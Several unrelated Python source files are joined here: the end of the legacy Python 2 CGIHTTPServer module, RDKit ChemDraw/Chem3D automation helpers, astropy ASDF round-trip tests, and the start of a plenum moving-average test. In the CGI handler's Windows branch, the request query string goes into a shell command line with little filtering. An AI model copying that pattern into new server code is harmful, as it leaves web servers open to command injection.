self.cgi_directories (and the next character is a '/'
or the end of the string).
"""
path = self.path
for x in self.cgi_directories:
i = len(x)
if path[:i] == x and (not path[i:] or path[i] == '/'):
self.cgi_info = path[:i], path[i+1:]
return 1
return 0
cgi_directories = ['/cgi-bin', '/htbin']
def is_executable(self, path):
"""Test whether argument path is an executable file."""
return executable(path)
def is_python(self, path):
"""Test whether argument path is a Python script."""
head, tail = os.path.splitext(path)
return tail.lower() in (".py", ".pyw")
def run_cgi(self):
"""Execute a CGI script."""
dir, rest = self.cgi_info
i = rest.rfind('?')
if i >= 0:
rest, query = rest[:i], rest[i+1:]
else:
query = ''
i = rest.find('/')
if i >= 0:
script, rest = rest[:i], rest[i:]
else:
script, rest = rest, ''
scriptname = dir + '/' + script
scriptfile = self.translate_path(scriptname)
if not os.path.exists(scriptfile):
self.send_error(404, "No such CGI script (%s)" % `scriptname`)
return
if not os.path.isfile(scriptfile):
self.send_error(403, "CGI script is not a plain file (%s)" %
`scriptname`)
return
ispy = self.is_python(scriptname)
if not ispy:
if not (self.have_fork or self.have_popen2):
self.send_error(403, "CGI script is not a Python script (%s)" %
`scriptname`)
return
if not self.is_executable(scriptfile):
self.send_error(403, "CGI script is not executable (%s)" %
`scriptname`)
return
# Reference: http://hoohoo.ncsa.uiuc.edu/cgi/env.html
# XXX Much of the following could be prepared ahead of time!
env = {}
env['SERVER_SOFTWARE'] = self.version_string()
env['SERVER_NAME'] = self.server.server_name
env['GATEWAY_INTERFACE'] = 'CGI/1.1'
env['SERVER_PROTOCOL'] = self.protocol_version
env['SERVER_PORT'] = str(self.server.server_port)
env['REQUEST_METHOD'] = self.command
uqrest = urllib.unquote(rest)
env['PATH_INFO'] = uqrest
env['PATH_TRANSLATED'] = self.translate_path(uqrest)
env['SCRIPT_NAME'] = scriptname
if query:
env['QUERY_STRING'] = query
host = self.address_string()
if host != self.client_address[0]:
env['REMOTE_HOST'] = host
env['REMOTE_ADDR'] = self.client_address[0]
# XXX AUTH_TYPE
# XXX REMOTE_USER
# XXX REMOTE_IDENT
if self.headers.typeheader is None:
env['CONTENT_TYPE'] = self.headers.type
else:
env['CONTENT_TYPE'] = self.headers.typeheader
length = self.headers.getheader('content-length')
if length:
env['CONTENT_LENGTH'] = length
accept = []
for line in self.headers.getallmatchingheaders('accept'):
if line[:1] in "\t\n\r ":
accept.append(line.strip())
else:
accept = accept + line[7:].split(',')
env['HTTP_ACCEPT'] = ','.join(accept)
ua = self.headers.getheader('user-agent')
if ua:
env['HTTP_USER_AGENT'] = ua
co = filter(None, self.headers.getheaders('cookie'))
if co:
env['HTTP_COOKIE'] = ', '.join(co)
# XXX Other HTTP_* headers
if not self.have_fork:
# Since we're setting the env in the parent, provide empty
# values to override previously set values
for k in ('QUERY_STRING', 'REMOTE_HOST', 'CONTENT_LENGTH',
'HTTP_USER_AGENT', 'HTTP_COOKIE'):
env.setdefault(k, "")
self.send_response(200, "Script output follows")
decoded_query = query.replace('+', ' ')
if self.have_fork:
# Unix -- fork as we should
args = [script]
if '=' not in decoded_query:
args.append(decoded_query)
nobody = nobody_uid()
self.rfile.flush() # Always flush before forking
self.wfile.flush() # Always flush before forking
pid = os.fork()
if pid != 0:
# Parent
pid, sts = os.waitpid(pid, 0)
if sts:
self.log_error("CGI script exit status %#x", sts)
return
# Child
try:
try:
os.setuid(nobody)
except os.error:
pass
os.dup2(self.rfile.fileno(), 0)
os.dup2(self.wfile.fileno(), 1)
os.execve(scriptfile, args, env)
except:
self.server.handle_error(self.request, self.client_address)
os._exit(127)
elif self.have_popen2:
# Windows -- use popen2 to create a subprocess
import shutil
os.environ.update(env)
cmdline = scriptfile
if self.is_python(scriptfile):
interp = sys.executable
if interp.lower().endswith("w.exe"):
# On Windows, use python.exe, not pythonw.exe
interp = interp[:-5] + interp[-4:]
cmdline = "%s -u %s" % (interp, cmdline)
if '=' not in query and '"' not in query:
cmdline = '%s "%s"' % (cmdline, query)
self.log_message("command: %s", cmdline)
try:
nbytes = int(length)
except:
nbytes = 0
fi, fo = os.popen2(cmdline, 'b')
if self.command.lower() == "post" and nbytes > 0:
data = self.rfile.read(nbytes)
fi.write(data)
fi.close()
shutil.copyfileobj(fo, self.wfile)
sts = fo.close()
if sts:
self.log_error("CGI script exit status %#x", sts)
else:
self.log_message("CGI script exited OK")
else:
# Other O.S. -- execute script in this process
os.environ.update(env)
save_argv = sys.argv
save_stdin = sys.stdin
save_stdout = sys.stdout
save_stderr = sys.stderr
try:
try:
sys.argv = [scriptfile]
if '=' not in decoded_query:
sys.argv.append(decoded_query)
sys.stdout = self.wfile
sys.stdin = self.rfile
execfile(scriptfile, {"__name__": "__main__"})
finally:
sys.argv = save_argv
sys.stdin = save_stdin
sys.stdout = save_stdout
sys.stderr = save_stderr
except SystemExit, sts:
self.log_error("CGI script exit status %s", str(sts))
else:
self.log_message("CGI script exited OK")
nobody = None
def nobody_uid():
"""Internal routine to get nobody's uid"""
global nobody
if nobody:
return nobody
try:
import pwd
except ImportError:
return -1
try:
nobody = pwd.getpwnam('nobody')[2]
except KeyError:
nobody = 1 + max(map(lambda x: x[2], pwd.getpwall()))
return nobody
def executable(path):
"""Test for executable file."""
try:
st = os.stat(path)
except os.error:
return 0
return st[0] & 0111 != 0
def test(HandlerClass = CGIHTTPRequestHandler,
ServerClass = BaseHTTPServer.HTTPServer):
SimpleHTTPServer.test(HandlerClass, ServerClass)
if __name__ == '__main__':
test()
|
|
# $Id$
#
# Copyright (C) 2002-2006 Greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
""" tools for interacting with chemdraw
"""
import tempfile, os, time
try:
import pythoncom
from win32com.client import gencache, Dispatch, constants
import win32com.client.gencache
cdxModule = win32com.client.gencache.EnsureModule("{5F646AAB-3B56-48D2-904C-A68D7989C251}", 0, 7,
0)
except Exception:
cdxModule = None
_cdxVersion = 0
raise ImportError("ChemDraw version (at least version 7) not found.")
else:
_cdxVersion = 7
if cdxModule:
from win32com.client import Dispatch
import win32gui
import re
cdApp = None
theDoc = None
theObjs = None
selectItem = None
cleanItem = None
centerItem = None
def StartChemDraw(visible=True, openDoc=False, showDoc=False):
""" launches chemdraw """
global cdApp, theDoc, theObjs, selectItem, cleanItem, centerItem
if cdApp is not None:
# if called more than once, do a restart
holder = None
selectItem = None
cleanItem = None
centerItem = None
theObjs = None
theDoc = None
cdApp = None
cdApp = Dispatch('ChemDraw.Application')
if openDoc:
theDoc = cdApp.Documents.Add()
theObjs = theDoc.Objects
else:
theDoc = None
selectItem = cdApp.MenuBars(1).Menus(2).MenuItems(8)
cleanItem = cdApp.MenuBars(1).Menus(5).MenuItems(6)
if _cdxVersion == 6:
centerItem = cdApp.MenuBars(1).Menus(4).MenuItems(1)
else:
centerItem = cdApp.MenuBars(1).Menus(4).MenuItems(7)
if visible:
cdApp.Visible = 1
if theDoc and showDoc:
theDoc.Activate()
def ReactivateChemDraw(openDoc=True, showDoc=True):
global cdApp, theDoc, theObjs
cdApp.Visible = 1
if openDoc:
theDoc = cdApp.Documents.Add()
if theDoc and showDoc:
theDoc.Activate()
theObjs = theDoc.Objects
# ------------------------------------------------------------------
# interactions with Chemdraw
# ------------------------------------------------------------------
def CDXConvert(inData, inFormat, outFormat):
"""converts the data passed in from one format to another
inFormat should be one of the following:
chemical/x-cdx chemical/cdx
chemical/x-daylight-smiles chemical/daylight-smiles
chemical/x-mdl-isis chemical/mdl-isis
chemical/x-mdl-molfile chemical/mdl-molfile
chemical/x-mdl-rxn chemical/mdl-rxn
chemical/x-mdl-tgf chemical/mdl-tgf
chemical/x-questel-F1
chemical/x-questel-F1-query
outFormat should be one of the preceding or:
image/x-png image/png
image/x-wmf image/wmf
image/tiff
application/postscript
image/gif
"""
global theObjs, theDoc
if cdApp is None:
StartChemDraw()
if theObjs is None:
if theDoc is None:
theDoc = cdApp.Documents.Add()
theObjs = theDoc.Objects
theObjs.SetData(inFormat, inData, pythoncom.Missing)
outD = theObjs.GetData(outFormat)
theObjs.Clear()
return outD
def CDXClean(inData, inFormat, outFormat):
"""calls the CDXLib Clean function on the data passed in.
CDXLib_Clean attempts to clean (prettify) the data before
doing an output conversion. It can be thought of as CDXConvert++.
CDXClean supports the same input and output specifiers as CDXConvert
(see above)
"""
global cdApp, theDoc, theObjs, selectItem, cleanItem
if cdApp is None:
StartChemDraw()
if theObjs is None:
if theDoc is None:
theDoc = cdApp.Documents.Add()
theObjs = theDoc.Objects
theObjs.SetData(inFormat, inData, pythoncom.Missing)
theObjs.Select()
cleanItem.Execute()
outD = theObjs.GetData(outFormat)
theObjs.Clear()
return outD
def CDXDisplay(inData, inFormat='chemical/cdx', clear=1):
""" displays the data in Chemdraw """
global cdApp, theDoc, theObjs, selectItem, cleanItem, centerItem
if cdApp is None:
StartChemDraw()
try:
theDoc.Activate()
except Exception:
ReactivateChemDraw()
theObjs = theDoc.Objects
if clear:
theObjs.Clear()
theObjs.SetData(inFormat, inData, pythoncom.Missing)
return
def CDXGrab(outFormat='chemical/x-mdl-molfile'):
""" returns the contents of the active chemdraw document
"""
global cdApp, theDoc
if cdApp is None:
res = ""
else:
cdApp.Visible = 1
if not cdApp.ActiveDocument:
ReactivateChemDraw()
try:
res = cdApp.ActiveDocument.Objects.GetData(outFormat)
except Exception:
res = ""
return res
def CloseChemdraw():
""" shuts down chemdraw
"""
global cdApp
try:
cdApp.Quit()
except Exception:
pass
Exit()
def Exit():
""" destroys our link to Chemdraw
"""
global cdApp
cdApp = None
def SaveChemDrawDoc(fileName='save.cdx'):
"""force chemdraw to save the active document
NOTE: the extension of the filename will determine the format
used to save the file.
"""
d = cdApp.ActiveDocument
d.SaveAs(fileName)
def CloseChemDrawDoc():
"""force chemdraw to save the active document
NOTE: the extension of the filename will determine the format
used to save the file.
"""
d = cdApp.ActiveDocument
d.Close()
def RaiseWindowNamed(nameRe):
# start by getting a list of all the windows:
cb = lambda x, y: y.append(x)
wins = []
win32gui.EnumWindows(cb, wins)
# now check to see if any match our regexp:
tgtWin = -1
for win in wins:
txt = win32gui.GetWindowText(win)
if nameRe.match(txt):
tgtWin = win
break
if tgtWin >= 0:
win32gui.ShowWindow(tgtWin, 1)
win32gui.BringWindowToTop(tgtWin)
def RaiseChemDraw():
e = re.compile('^ChemDraw')
RaiseWindowNamed(e)
try:
from PIL import Image
from io import StringIO
def SmilesToPilImage(smilesStr):
"""takes a SMILES string and returns a PIL image using chemdraw
"""
return MolToPilImage(smilesStr, inFormat='chemical/daylight-smiles', outFormat='image/gif')
def MolToPilImage(dataStr, inFormat='chemical/daylight-smiles', outFormat='image/gif'):
"""takes a molecule string and returns a PIL image using chemdraw
"""
# do the conversion...
res = CDXConvert(dataStr, inFormat, outFormat)
dataFile = StringIO(str(res))
img = Image.open(dataFile).convert('RGB')
return img
except ImportError:
def SmilesToPilImage(smilesStr):
print('You need to have PIL installed to use this functionality')
return None
def MolToPilImage(dataStr, inFormat='chemical/daylight-smiles', outFormat='image/gif'):
print('You need to have PIL installed to use this functionality')
return None
# ------------------------------------------------------------------
# interactions with Chem3D
# ------------------------------------------------------------------
c3dApp = None
def StartChem3D(visible=0):
""" launches Chem3D """
global c3dApp
c3dApp = Dispatch('Chem3D.Application')
if not c3dApp.Visible:
c3dApp.Visible = visible
def CloseChem3D():
""" shuts down Chem3D """
global c3dApp
c3dApp.Quit()
c3dApp = None
availChem3DProps = ('DipoleMoment', 'BendEnergy', 'Non14VDWEnergy', 'StericEnergy',
'StretchBendEnergy', 'StretchEnergy', 'TorsionEnergy', 'VDW14Energy')
def Add3DCoordsToMol(data, format, props={}):
""" adds 3D coordinates to the data passed in using Chem3D
**Arguments**
- data: the molecular data
- format: the format of _data_. Should be something accepted by
_CDXConvert_
- props: (optional) a dictionary used to return calculated properties
"""
global c3dApp
if c3dApp is None:
StartChem3D()
if format != 'chemical/mdl-molfile':
molData = CDXClean(data, format, 'chemical/mdl-molfile')
else:
molData = data
with tempfile.NamedTemporaryFile(suffix='.mol', delete=False) as molF:
molF.write(molData)
doc = c3dApp.Documents.Open(molF.name)
if not doc:
print('cannot open molecule')
raise ValueError('No Molecule')
# set up the MM2 job
job = Dispatch('Chem3D.MM2Job')
job.Type = 1
job.DisplayEveryIteration = 0
job.RecordEveryIteration = 0
# start the calculation...
doc.MM2Compute(job)
# and wait for it to finish
while doc.ComputeStatus in [0x434f4d50, 0x50454e44]:
pass
#outFName = tempfile.mktemp('.mol')
# this is horrible, but apparently Chem3D gets pissy with tempfiles:
outFName = os.getcwd() + '/to3d.mol'
doc.SaveAs(outFName)
# generate the properties
for prop in availChem3DProps:
props[prop] = eval('doc.%s' % prop)
doc.Close(0)
os.unlink(molF.name)
c3dData = open(outFName, 'r').read()
gone = 0
while not gone:
try:
os.unlink(outFName)
except Exception:
time.sleep(.5)
else:
gone = 1
return c3dData
def OptimizeSDFile(inFileName, outFileName, problemFileName='problems.sdf', restartEvery=20):
""" optimizes the structure of every molecule in the input SD file
**Arguments**
- inFileName: name of the input SD file
- outFileName: name of the output SD file
- problemFileName: (optional) name of the SD file used to store molecules which
fail during the optimization process
- restartEvery: (optional) Chem3D will be shut down and restarted
every _restartEvery_ molecules to try and keep core leaks under control
"""
inFile = open(inFileName, 'r')
outFile = open(outFileName, 'w+')
problemFile = None
props = {}
lines = []
nextLine = inFile.readline()
skip = 0
nDone = 0
t1 = time.time()
while nextLine != '':
if nextLine.find('M END') != -1:
lines.append(nextLine)
molBlock = ''.join(lines)
try:
newMolBlock = Add3DCoordsToMol(molBlock, 'chemical/mdl-molfile', props=props)
except Exception:
badBlock = molBlock
skip = 1
lines = []
else:
skip = 0
lines = [newMolBlock]
elif nextLine.find('$$$$') != -1:
t2 = time.time()
nDone += 1
print('finished molecule %d in %f seconds' % (nDone, time.time() - t1))
t1 = time.time()
if nDone % restartEvery == 0:
CloseChem3D()
StartChem3D()
outFile.close()
outFile = open(outFileName, 'a')
if not skip:
for prop in props.keys():
lines.append('> <%s>\n%f\n\n' % (prop, props[prop]))
lines.append(nextLine)
outFile.write(''.join(lines))
lines = []
else:
skip = 0
lines.append(nextLine)
if problemFile is None:
problemFile = open(problemFileName, 'w+')
problemFile.write(badBlock)
problemFile.write(''.join(lines))
lines = []
else:
lines.append(nextLine)
nextLine = inFile.readline()
outFile.close()
if problemFile is not None:
problemFile.close()
if __name__ == '__main__':
inStr = 'CCC(C=O)CCC'
img = SmilesToPilImage(inStr)
img.save('foo.jpg')
convStr = CDXClean(inStr, 'chemical/x-daylight-smiles', 'chemical/x-daylight-smiles')
print('in:', inStr)
print('out:', convStr)
convStr = CDXConvert(inStr, 'chemical/x-daylight-smiles', 'chemical/x-mdl-molfile')
print('in:', inStr)
print('out:', convStr)
convStr2 = CDXClean(convStr, 'chemical/x-mdl-molfile', 'chemical/x-mdl-molfile')
print('out2:', convStr2)
inStr = 'COc1ccc(c2onc(c2C(=O)NCCc3ccc(F)cc3)c4ccc(F)cc4)c(OC)c1'
convStr = CDXConvert(inStr, 'chemical/x-daylight-smiles', 'chemical/x-mdl-molfile')
out = open('test.mol', 'w+')
out.write(convStr)
out.close()
|
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
import pytest
asdf = pytest.importorskip('asdf')
import warnings
from packaging.version import Version
import numpy as np
from asdf import util
from asdf.tests import helpers
from asdf import AsdfFile
import asdf
import astropy.units as u
from astropy.modeling.core import fix_inputs
from astropy.modeling import models as astmodels
def custom_and_analytical_inverse():
p1 = astmodels.Polynomial1D(1)
p2 = astmodels.Polynomial1D(1)
p3 = astmodels.Polynomial1D(1)
p4 = astmodels.Polynomial1D(1)
m1 = p1 & p2
m2 = p3 & p4
m1.inverse = m2
return m1
def custom_inputs_outputs():
m = astmodels.Gaussian2D()
m.inputs = ('a', 'b')
m.outputs = ('c',)
return m
test_models = [
astmodels.Identity(2), astmodels.Polynomial1D(2, c0=1, c1=2, c2=3),
astmodels.Polynomial2D(1, c0_0=1, c0_1=2, c1_0=3),
astmodels.Shift(2.),
astmodels.Hermite1D(2, c0=2, c1=3, c2=0.5),
astmodels.Legendre1D(2, c0=2, c1=3, c2=0.5),
astmodels.Chebyshev1D(2, c0=2, c1=3, c2=0.5),
astmodels.Chebyshev2D(1, 1, c0_0=1, c0_1=2, c1_0=3),
astmodels.Legendre2D(1, 1, c0_0=1, c0_1=2, c1_0=3),
astmodels.Hermite2D(1, 1, c0_0=1, c0_1=2, c1_0=3),
astmodels.Scale(3.4), astmodels.RotateNative2Celestial(5.63, -72.5, 180),
astmodels.Multiply(3), astmodels.Multiply(10*u.m),
astmodels.RotateCelestial2Native(5.63, -72.5, 180),
astmodels.EulerAngleRotation(23, 14, 2.3, axes_order='xzx'),
astmodels.Mapping((0, 1), n_inputs=3),
astmodels.Shift(2.*u.deg),
astmodels.Scale(3.4*u.deg),
astmodels.RotateNative2Celestial(5.63*u.deg, -72.5*u.deg, 180*u.deg),
astmodels.RotateCelestial2Native(5.63*u.deg, -72.5*u.deg, 180*u.deg),
astmodels.RotationSequence3D([1.2, 2.3, 3.4, .3], 'xyzx'),
astmodels.SphericalRotationSequence([1.2, 2.3, 3.4, .3], 'xyzy'),
astmodels.AiryDisk2D(amplitude=10., x_0=0.5, y_0=1.5),
astmodels.Box1D(amplitude=10., x_0=0.5, width=5.),
astmodels.Box2D(amplitude=10., x_0=0.5, x_width=5., y_0=1.5, y_width=7.),
astmodels.Const1D(amplitude=5.),
astmodels.Const2D(amplitude=5.),
astmodels.Disk2D(amplitude=10., x_0=0.5, y_0=1.5, R_0=5.),
astmodels.Ellipse2D(amplitude=10., x_0=0.5, y_0=1.5, a=2., b=4., theta=0.1),
astmodels.Exponential1D(amplitude=10., tau=3.5),
astmodels.Gaussian1D(amplitude=10., mean=5., stddev=3.),
astmodels.Gaussian2D(amplitude=10., x_mean=5., y_mean=5., x_stddev=3., y_stddev=3.),
astmodels.KingProjectedAnalytic1D(amplitude=10., r_core=5., r_tide=2.),
astmodels.Logarithmic1D(amplitude=10., tau=3.5),
astmodels.Lorentz1D(amplitude=10., x_0=0.5, fwhm=2.5),
astmodels.Moffat1D(amplitude=10., x_0=0.5, gamma=1.2, alpha=2.5),
astmodels.Moffat2D(amplitude=10., x_0=0.5, y_0=1.5, gamma=1.2, alpha=2.5),
astmodels.Planar2D(slope_x=0.5, slope_y=1.2, intercept=2.5),
astmodels.RedshiftScaleFactor(z=2.5),
astmodels.RickerWavelet1D(amplitude=10., x_0=0.5, sigma=1.2),
astmodels.RickerWavelet2D(amplitude=10., x_0=0.5, y_0=1.5, sigma=1.2),
astmodels.Ring2D(amplitude=10., x_0=0.5, y_0=1.5, r_in=5., width=10.),
astmodels.Sersic1D(amplitude=10., r_eff=1., n=4.),
astmodels.Sersic2D(amplitude=10., r_eff=1., n=4., x_0=0.5, y_0=1.5, ellip=0.0, theta=0.0),
astmodels.Sine1D(amplitude=10., frequency=0.5, phase=1.),
astmodels.Trapezoid1D(amplitude=10., x_0=0.5, width=5., slope=1.),
astmodels.TrapezoidDisk2D(amplitude=10., x_0=0.5, y_0=1.5, R_0=5., slope=1.),
astmodels.Voigt1D(x_0=0.55, amplitude_L=10., fwhm_L=0.5, fwhm_G=0.9),
astmodels.BlackBody(scale=10.0, temperature=6000.*u.K),
astmodels.Drude1D(amplitude=10.0, x_0=0.5, fwhm=2.5),
astmodels.Plummer1D(mass=10.0, r_plum=5.0),
astmodels.BrokenPowerLaw1D(amplitude=10, x_break=0.5, alpha_1=2.0, alpha_2=3.5),
astmodels.ExponentialCutoffPowerLaw1D(10, 0.5, 2.0, 7.),
astmodels.LogParabola1D(amplitude=10, x_0=0.5, alpha=2., beta=3.,),
astmodels.PowerLaw1D(amplitude=10., x_0=0.5, alpha=2.0),
astmodels.SmoothlyBrokenPowerLaw1D(amplitude=10., x_break=5.0, alpha_1=2.0, alpha_2=3.0, delta=0.5),
custom_and_analytical_inverse(),
custom_inputs_outputs(),
]
math_models = []
for kl in astmodels.math.__all__:
klass = getattr(astmodels.math, kl)
math_models.append(klass())
test_models.extend(math_models)
test_models_with_constraints = [astmodels.Legendre2D(x_degree=1, y_degree=1,
c0_0=1, c0_1=2, c1_0=3,
fixed={'c1_0': True, 'c0_1': True},
bounds={'c0_0': (-10, 10)})]
test_models.extend(test_models_with_constraints)
def test_transforms_compound(tmpdir):
tree = {
'compound':
astmodels.Shift(1) & astmodels.Shift(2) |
astmodels.Sky2Pix_TAN() |
astmodels.Rotation2D() |
astmodels.AffineTransformation2D([[2, 0], [0, 2]], [42, 32]) +
astmodels.Rotation2D(32)
}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_inverse_transforms(tmpdir):
rotation = astmodels.Rotation2D(32)
rotation.inverse = astmodels.Rotation2D(45)
real_rotation = astmodels.Rotation2D(32)
tree = {
'rotation': rotation,
'real_rotation': real_rotation
}
def check(ff):
assert ff.tree['rotation'].inverse.angle == 45
helpers.assert_roundtrip_tree(tree, tmpdir, asdf_check_func=check)
@pytest.mark.parametrize(('model'), test_models)
def test_single_model(tmpdir, model):
with warnings.catch_warnings():
# Some schema files are missing from asdf<=2.6.0 which causes warnings
if Version(asdf.__version__) <= Version('2.6.0'):
warnings.filterwarnings('ignore', 'Unable to locate schema file')
tree = {'single_model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_name(tmpdir):
def check(ff):
assert ff.tree['rot'].name == 'foo'
tree = {'rot': astmodels.Rotation2D(23, name='foo')}
helpers.assert_roundtrip_tree(tree, tmpdir, asdf_check_func=check)
def test_zenithal_with_arguments(tmpdir):
tree = {
'azp': astmodels.Sky2Pix_AZP(0.5, 0.3)
}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_naming_of_compound_model(tmpdir):
"""Issue #87"""
def asdf_check(ff):
assert ff.tree['model'].name == 'compound_model'
offx = astmodels.Shift(1)
scl = astmodels.Scale(2)
model = (offx | scl).rename('compound_model')
tree = {
'model': model
}
helpers.assert_roundtrip_tree(tree, tmpdir, asdf_check_func=asdf_check)
def test_generic_projections(tmpdir):
from astropy.io.misc.asdf.tags.transform import projections
for tag_name, (name, params, version) in projections._generic_projections.items():
tree = {
'forward': util.resolve_name(
f'astropy.modeling.projections.Sky2Pix_{name}')(),
'backward': util.resolve_name(
f'astropy.modeling.projections.Pix2Sky_{name}')()
}
with warnings.catch_warnings():
# Some schema files are missing from asdf<=2.4.2 which causes warnings
if Version(asdf.__version__) <= Version('2.5.1'):
warnings.filterwarnings('ignore', 'Unable to locate schema file')
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_tabular_model(tmpdir):
points = np.arange(0, 5)
values = [1., 10, 2, 45, -3]
model = astmodels.Tabular1D(points=points, lookup_table=values)
tree = {'model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
table = np.array([[3., 0., 0.],
[0., 2., 0.],
[0., 0., 0.]])
points = ([1, 2, 3], [1, 2, 3])
model2 = astmodels.Tabular2D(points, lookup_table=table, bounds_error=False,
fill_value=None, method='nearest')
tree = {'model': model2}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_bounding_box(tmpdir):
model = astmodels.Shift(1) & astmodels.Shift(2)
model.bounding_box = ((1, 3), (2, 4))
tree = {'model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
@pytest.mark.parametrize("standard_version", asdf.versioning.supported_versions)
def test_const1d(tmpdir, standard_version):
helpers.assert_roundtrip_tree(
{"model": astmodels.Const1D(amplitude=5.)},
tmpdir,
init_options={"version": standard_version}
)
@pytest.mark.parametrize("standard_version", asdf.versioning.supported_versions)
@pytest.mark.parametrize("model", [
astmodels.Polynomial1D(1, c0=5, c1=17),
astmodels.Polynomial1D(1, c0=5, c1=17, domain=[-5, 4], window=[-2, 3]),
astmodels.Polynomial2D(2, c0_0=3, c1_0=5, c0_1=7),
astmodels.Polynomial2D(
2, c0_0=3, c1_0=5, c0_1=7, x_domain=[-2, 2], y_domain=[-4, 4],
x_window=[-6, 6], y_window=[-8, 8]
),
])
def test_polynomial(tmpdir, standard_version, model):
helpers.assert_roundtrip_tree({"model": model}, tmpdir, init_options={"version": standard_version})
def test_domain_orthopoly(tmpdir):
model1d = astmodels.Chebyshev1D(2, c0=2, c1=3, c2=0.5, domain=[-2, 2])
model2d = astmodels.Chebyshev2D(1, 1, c0_0=1, c0_1=2, c1_0=3,
x_domain=[-2, 2], y_domain=[-2, 2])
fa = AsdfFile()
fa.tree['model1d'] = model1d
fa.tree['model2d'] = model2d
file_path = str(tmpdir.join('orthopoly_domain.asdf'))
fa.write_to(file_path)
with asdf.open(file_path) as f:
assert f.tree['model1d'](1.8) == model1d(1.8)
assert f.tree['model2d'](1.8, -1.5) == model2d(1.8, -1.5)
def test_window_orthopoly(tmpdir):
model1d = astmodels.Chebyshev1D(2, c0=2, c1=3, c2=0.5,
domain=[-2, 2], window=[-0.5, 0.5])
model2d = astmodels.Chebyshev2D(1, 1, c0_0=1, c0_1=2, c1_0=3,
x_domain=[-2, 2], y_domain=[-2, 2],
x_window=[-0.5, 0.5], y_window=[-0.1, 0.5])
fa = AsdfFile()
fa.tree['model1d'] = model1d
fa.tree['model2d'] = model2d
file_path = str(tmpdir.join('orthopoly_window.asdf'))
fa.write_to(file_path)
with asdf.open(file_path) as f:
assert f.tree['model1d'](1.8) == model1d(1.8)
assert f.tree['model2d'](1.8, -1.5) == model2d(1.8, -1.5)
def test_linear1d(tmpdir):
model = astmodels.Linear1D()
tree = {'model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_linear1d_quantity(tmpdir):
model = astmodels.Linear1D(1*u.nm, 1*(u.nm/u.pixel))
tree = {'model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_tabular_model_units(tmpdir):
points = np.arange(0, 5) * u.pix
values = [1., 10, 2, 45, -3] * u.nm
model = astmodels.Tabular1D(points=points, lookup_table=values)
tree = {'model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
table = np.array([[3., 0., 0.],
[0., 2., 0.],
[0., 0., 0.]]) * u.nm
points = ([1, 2, 3], [1, 2, 3]) * u.pix
model2 = astmodels.Tabular2D(points, lookup_table=table,
bounds_error=False, fill_value=None,
method='nearest')
tree = {'model': model2}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_fix_inputs(tmpdir):
with warnings.catch_warnings():
# Some schema files are missing from asdf<=2.4.2 which causes warnings
if Version(asdf.__version__) <= Version('2.5.1'):
warnings.filterwarnings('ignore', 'Unable to locate schema file')
model0 = astmodels.Pix2Sky_TAN()
model0.input_units_equivalencies = {'x': u.dimensionless_angles(),
'y': u.dimensionless_angles()}
model1 = astmodels.Rotation2D()
model = model0 | model1
tree = {
'compound': fix_inputs(model, {'x': 45}),
'compound1': fix_inputs(model, {0: 45})
}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_fix_inputs_type():
with pytest.raises(TypeError):
tree = {
'compound': fix_inputs(3, {'x': 45})
}
helpers.assert_roundtrip_tree(tree, tmpdir)
with pytest.raises(AttributeError):
tree = {
'compound': astmodels.Pix2Sky_TAN() & {'x': 45}
}
helpers.assert_roundtrip_tree(tree, tmpdir)
comp_model = custom_and_analytical_inverse()
@pytest.mark.parametrize(('model'), [astmodels.Shift(1) & astmodels.Shift(2) | comp_model,
comp_model | astmodels.Shift(1) & astmodels.Shift(2),
astmodels.Shift(1) & comp_model,
comp_model & astmodels.Shift(1)
])
def test_custom_and_analytical(model, tmpdir):
fa = AsdfFile()
fa.tree['model'] = model
file_path = str(tmpdir.join('custom_and_analytical_inverse.asdf'))
fa.write_to(file_path)
with asdf.open(file_path) as f:
assert f.tree['model'].inverse is not None
def test_deserialize_compound_user_inverse(tmpdir):
"""
Confirm that we are able to correctly reconstruct a
compound model with a user inverse set on one of its
component models.
Due to code in TransformType that facilitates circular
inverses, the user inverse of the component model is
not available at the time that the CompoundModel is
constructed.
"""
yaml = """
model: !transform/concatenate-1.2.0
forward:
- !transform/shift-1.2.0
inverse: !transform/shift-1.2.0 {offset: 5.0}
offset: -10.0
- !transform/shift-1.2.0 {offset: -20.0}
"""
buff = helpers.yaml_to_asdf(yaml)
with asdf.open(buff) as af:
model = af["model"]
assert model.has_inverse()
assert model.inverse(-5, -20) == (0, 0)
# test some models and compound models with some input unit equivalencies
def models_with_input_eq():
# 1D model
m1 = astmodels.Shift(1*u.kg)
m1.input_units_equivalencies = {'x': u.mass_energy()}
# 2D model
m2 = astmodels.Const2D(10*u.Hz)
m2.input_units_equivalencies = {'x': u.dimensionless_angles(),
'y': u.dimensionless_angles()}
# 2D model with only one input equivalencies
m3 = astmodels.Const2D(10*u.Hz)
m3.input_units_equivalencies = {'x': u.dimensionless_angles()}
# model using equivalency that has args using units
m4 = astmodels.PowerLaw1D(amplitude=1*u.m, x_0=10*u.pix, alpha=7)
m4.input_units_equivalencies = {'x': u.equivalencies.pixel_scale(0.5*u.arcsec/u.pix)}
return[m1, m2, m3, m4]
def compound_models_with_input_eq():
m1 = astmodels.Gaussian1D(10*u.K, 11*u.arcsec, 12*u.arcsec)
m1.input_units_equivalencies = {'x': u.parallax()}
m2 = astmodels.Gaussian1D(5*u.s, 2*u.K, 3*u.K)
m2.input_units_equivalencies = {'x': u.temperature()}
return [m1|m2, m1&m2, m1+m2]
test_models.extend(models_with_input_eq())
test_models.extend(compound_models_with_input_eq())
|
|
import math
from typing import Optional
import pytest
from plenum.common.moving_average import MovingAverage, ExponentialMovingAverage, EventFrequencyEstimator, \
EMAEventFrequencyEstimator
START_TIME = 10
STEP = 3
class MockMovingAverage(MovingAverage):
def __init__(self):
self.updates = []
self.reset_called = False
